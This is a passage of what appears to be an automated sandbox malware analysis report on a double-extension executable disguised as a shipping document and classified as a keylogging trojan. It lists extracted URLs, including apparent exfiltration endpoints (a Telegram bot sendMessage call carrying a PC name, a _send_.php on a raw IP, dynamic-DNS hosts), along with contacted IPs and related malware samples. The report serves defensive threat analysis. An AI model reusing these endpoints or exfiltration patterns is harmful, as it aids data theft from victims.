                                                  http://www.goodfont.co.krHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://chrome.google.com/webstore?hl=enHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003344000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://varders.kozow.com:8081HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003181000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                        high
                                                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20aHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003266000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.sajatypeworks.comHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.typography.netDHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.founder.com.cn/cn/cTheHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.galapagosdesign.com/staff/dennis.htmHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004502000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.000000000440B000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004267000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.00000000042AF000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.000000000423A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://checkip.dyndns.org/qHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://chrome.google.com/webstore?hl=enlBHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.000000000333F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.galapagosdesign.com/DPleaseHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.fonts.comHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.sandoll.co.krHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.urwpp.deDPleaseHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.zhongyicts.com.cnHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1729417735.0000000002971000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003181000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.sakkal.comHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://reallyfreegeoip.org/xml/HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.00000000031D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://www.office.com/HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003375000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003366000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.000000000328B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.apache.org/licenses/LICENSE-2.0HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.fontbureau.comHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://checkip.dyndns.orgHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003181000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004403000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.00000000042AD000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.00000000042D4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.000000000425F000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.000000000328B000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004527000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004451000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003266000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.carterandcone.comlHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://aborters.duckdns.org:8081HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003181000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://www.fontbureau.com/designers/cabarga.htmlNHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.founder.com.cn/cnHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://www.fontbureau.com/designers/frere-user.htmlHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://anotherarmy.dns.army:8081HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003181000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://www.jiyu-kobo.co.jp/HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://reallyfreegeoip.org/xml/8.46.123.189$HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003266000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003240000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.00000000031FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://reallyfreegeoip.orgHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003266000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.0000000003240000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4163850836.00000000031D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.fontbureau.com/designers8HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1735093429.0000000006FD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004502000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.000000000440B000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.00000000043DE000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.0000000004267000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.00000000042AF000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4166901614.000000000423A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedHIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000000.00000002.1730714244.00000000041E4000.00000004.00000800.00020000.00000000.sdmp, HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe, 00000003.00000002.4162240425.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            • No. of IPs < 25%
                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                            • 75% < No. of IPs
                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                            149.154.167.220
                                                                                                                            api.telegram.orgUnited Kingdom
                                                                                                                            62041TELEGRAMRUfalse
                                                                                                                            104.21.67.152
                                                                                                                            reallyfreegeoip.orgUnited States
                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                            193.122.130.0
                                                                                                                            checkip.dyndns.comUnited States
                                                                                                                            31898ORACLE-BMC-31898USfalse
                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                            Analysis ID:1576530
                                                                                                                            Start date and time:2024-12-17 08:32:13 +01:00
                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                            Overall analysis duration:0h 8m 25s
                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                            Report type:full
                                                                                                                            Cookbook file name:default.jbs
                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                            Number of analysed new started processes analysed:9
                                                                                                                            Number of new started drivers analysed:0
                                                                                                                            Number of existing processes analysed:0
                                                                                                                            Number of existing drivers analysed:0
                                                                                                                            Number of injected processes analysed:0
                                                                                                                            Technologies:
                                                                                                                            • HCA enabled
                                                                                                                            • EGA enabled
                                                                                                                            • AMSI enabled
                                                                                                                            Analysis Mode:default
                                                                                                                            Analysis stop reason:Timeout
                                                                                                                            Sample name:HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe
                                                                                                                            Detection:MAL
                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@6/3@3/3
                                                                                                                            EGA Information:
                                                                                                                            • Successful, ratio: 100%
                                                                                                                            HCA Information:
                                                                                                                            • Successful, ratio: 100%
                                                                                                                            • Number of executed functions: 247
                                                                                                                            • Number of non-executed functions: 38
                                                                                                                            Cookbook Comments:
                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                            • Excluded IPs from analysis (whitelisted): 23.218.208.109, 4.245.163.56, 13.107.246.63
                                                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                            TimeTypeDescription
                                                                                                                            02:33:07API Interceptor11048070x Sleep call for process: HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe modified
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            149.154.167.220Order129845.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                  l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                        QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                              PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                                                                104.21.67.152hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                  Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                        FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                          ref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                            CITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                  SWIFT091816-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                    193.122.130.0PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                    ref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                    TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                    REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                    SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                    file.exeGet hashmaliciousAmadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                    AsyncClient.exeGet hashmaliciousAsyncRAT, HVNC, PureLog StealerBrowse
                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                    TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                    T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                    Malzeme #U0130stek Formu_12102024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • checkip.dyndns.org/
                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                    checkip.dyndns.comhesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 132.226.247.73
                                                                                                                                                                    PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                    • 193.122.130.0
                                                                                                                                                                    Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 158.101.44.242
                                                                                                                                                                    pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 193.122.6.168
                                                                                                                                                                    QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                    • 193.122.6.168
                                                                                                                                                                    FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 158.101.44.242
                                                                                                                                                                    REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                    • 158.101.44.242
                                                                                                                                                                    PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                                                                                    • 132.226.8.169
                                                                                                                                                                    ref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                    • 193.122.130.0
                                                                                                                                                                    CITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                    • 132.226.8.169
                                                                                                                                                                    reallyfreegeoip.orghesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 104.21.67.152
                                                                                                                                                                    PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                    • 188.114.97.3
                                                                                                                                                                    Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 104.21.67.152
                                                                                                                                                                    pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 104.21.67.152
                                                                                                                                                                    QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                    • 104.21.67.152
                                                                                                                                                                    FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 104.21.67.152
                                                                                                                                                                    REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                    • 172.67.177.134
                                                                                                                                                                    PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                                                                                    • 172.67.177.134
                                                                                                                                                                    ref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                    • 104.21.67.152
                                                                                                                                                                    CITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                    • 104.21.67.152
                                                                                                                                                                    api.telegram.orgOrder129845.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                    TELEGRAMRU69633f.msiGet hashmaliciousVidarBrowse
                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                    Order129845.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    l9IH82eiKw.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    dZKPE9gotO.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                    QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                    CLOUDFLARENETUShttps://quarantine-emails13122024bcpe038qua8303rantine0832411.s3.eu-central-3.ionoscloud.com/message.html#anneke.hanekom@mmiholdings.co.zaGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                    • 104.18.11.207
                                                                                                                                                                    Assinar_PDF_3476.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 104.21.32.1
                                                                                                                                                                    hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                    • 104.21.67.152
                                                                                                                                                                    Sublabially.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                    • 172.67.210.11
                                                                                                                                                                    Brokerage Invoice.pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 104.21.2.70
                                                                                                                                                                    DHL.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                    • 104.21.48.233
                                                                                                                                                                    SFHgtxFGtB.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                    • 104.21.87.65
                                                                                                                                                                    DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                    he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                    • 104.21.56.70
                                                                                                                                                                    fsg5PWtTm2.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                                                                                    • 104.21.87.65
                                                                                                                                                                    ORACLE-BMC-31898USldr.ps1Get hashmaliciousGO Miner, XmrigBrowse
                                                                                                                                                                    • 147.154.227.160
                                                                                                                                                                    PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                    • 193.122.130.0
                                                                                                                                                                    end.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                    • 130.61.86.87
                                                                                                                                                                    Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 158.101.44.242
                                                                                                                                                                    pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 158.101.44.242
                                                                                                                                                                    QUOTATION REQUEST - BQS058.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                    • 193.122.6.168
                                                                                                                                                                    FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 158.101.44.242
                                                                                                                                                                    REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                    • 158.101.44.242
                                                                                                                                                                    ref_97024130865.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                    • 193.122.130.0
                                                                                                                                                                    TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                    • 193.122.130.0
